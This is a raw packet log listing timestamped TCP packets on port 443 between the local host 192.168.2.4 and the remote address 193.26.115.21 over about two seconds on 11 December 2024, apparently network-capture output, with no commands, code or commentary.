Dec 11, 2024 18:03:17.900784016 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.907046080 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.907073021 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.907115936 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.907128096 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.907146931 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.907160997 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.067954063 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.067975998 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.068015099 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.068036079 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.068069935 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.068069935 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.073410034 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.073429108 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.073487043 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.073493958 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.073517084 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.073548079 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.078771114 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.078802109 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.078845978 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.078852892 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.078886986 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.078886986 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.084547043 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.084568977 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.084630966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.084630966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.084638119 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.084722996 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.090460062 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.090485096 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.090528965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.090537071 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.090586901 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.090586901 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.095673084 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.095704079 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.095733881 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.095746040 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.095789909 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.095789909 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.102020025 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.102041960 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.102071047 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.102085114 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.102123022 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.102123022 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.107212067 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.107235909 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.107270002 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.107285023 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.107325077 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.107325077 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.120608091 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.259810925 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.259835005 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.260255098 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.260255098 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.260268927 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.260814905 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.265714884 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.265736103 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.266371965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.266371965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.266387939 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.267432928 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.270451069 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.270473003 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.271337032 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.271337032 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.271356106 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.275335073 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.276448965 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.276470900 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.276623964 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.276623964 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.276633024 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.277437925 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.282504082 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.282525063 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.282744884 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.282744884 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.282764912 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.283335924 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.287575006 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.287595987 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.289489031 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.289506912 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.291340113 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.293869972 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.293895006 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.294265985 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.294265985 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.294274092 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.294554949 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.299032927 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.299052954 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.299187899 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.299187899 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.299196005 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.299312115 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.334255934 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.452292919 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.452323914 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.452461004 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.452474117 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.452500105 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.452783108 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.456651926 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.456676960 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.456765890 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.456765890 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.456773043 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.460582018 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.462661982 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.462683916 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.462826967 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.462826967 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.462835073 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.463104963 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.468657970 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.468682051 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.468782902 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.468782902 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.468790054 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.468885899 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.474975109 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.474994898 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.475169897 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.475169897 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.475177050 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.475342035 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.480263948 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.480288029 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.480685949 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.480685949 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.480694056 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.482561111 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.483006001 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.485441923 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.485462904 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.485563993 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.485563993 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.485582113 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.485658884 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.488312960 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.491272926 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.491292953 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.491354942 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.491354942 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.491363049 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.492012978 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.500350952 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.644392014 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.644423008 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.644548893 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.644548893 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.644573927 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.645334959 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.649681091 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.649702072 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.650131941 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.650139093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.650342941 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.655050993 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.655072927 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.655384064 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.655401945 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.656042099 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.660821915 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.660835981 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.661022902 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.661022902 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.661031008 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.661091089 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.666673899 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.666687012 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.667006016 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.667033911 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.667762995 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.672240019 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.672252893 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.672477007 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.672486067 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.672602892 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.675060034 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.678221941 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.678234100 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.678325891 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.678340912 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.680212021 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.683347940 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.683361053 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.683624983 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.683640957 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.684318066 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.700306892 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.836343050 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.836368084 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.836433887 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.836447954 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.836529016 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.836529016 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.841661930 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.841675997 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.841789961 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.841805935 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.841906071 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.841922045 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.847630024 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.847644091 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.848609924 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.848619938 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.848690033 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.852842093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.852854013 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.853564024 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.853583097 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.853842020 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.858695984 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.858709097 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.858901024 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.858901024 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.858907938 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.858975887 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.864686966 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.864703894 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.864981890 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.864981890 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.865000963 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.865283966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.870233059 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.870248079 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.870340109 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.870352983 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.870397091 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.876240969 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.876255989 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.876341105 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.876341105 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:18.876351118 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:18.877177000 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.028361082 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.028378963 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.028515100 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.028515100 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.028531075 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.029144049 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.033829927 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.033845901 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.034086943 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.034105062 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.034296036 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.038990974 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.039011955 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.039190054 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.039208889 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.039557934 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.045068979 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.045082092 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.045164108 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.045171022 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.045223951 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.050877094 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.050889015 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.051068068 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.051086903 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.051228046 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.054728031 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.056190968 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.056202888 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.056288004 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.056301117 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.059343100 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.062496901 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.062532902 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.062603951 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.062603951 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.062612057 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.062683105 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.067687988 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.067711115 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.067770958 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.067779064 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.067799091 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.067889929 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.083360910 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.220905066 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.220930099 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.220968962 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.220985889 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.220998049 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.221082926 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.225946903 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.225970030 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.226006985 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.226013899 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.226037979 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.226049900 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.231861115 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.231884003 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.231923103 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.231930017 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.231955051 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.231972933 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.237354994 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.237375021 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.237428904 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.237437010 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.237448931 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.237490892 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.243017912 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.243038893 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.243089914 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.243098974 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.243135929 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.248867035 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.248887062 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.248977900 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.248977900 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.248986959 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.249069929 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.254406929 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.254426956 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.254463911 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.254471064 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.254502058 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.254520893 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.260380030 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.260400057 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.260440111 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.260451078 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.260488987 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.412920952 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.412942886 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.413141012 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.413176060 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.413227081 CET	49735	443	192.168.2.4	193.26.115.21
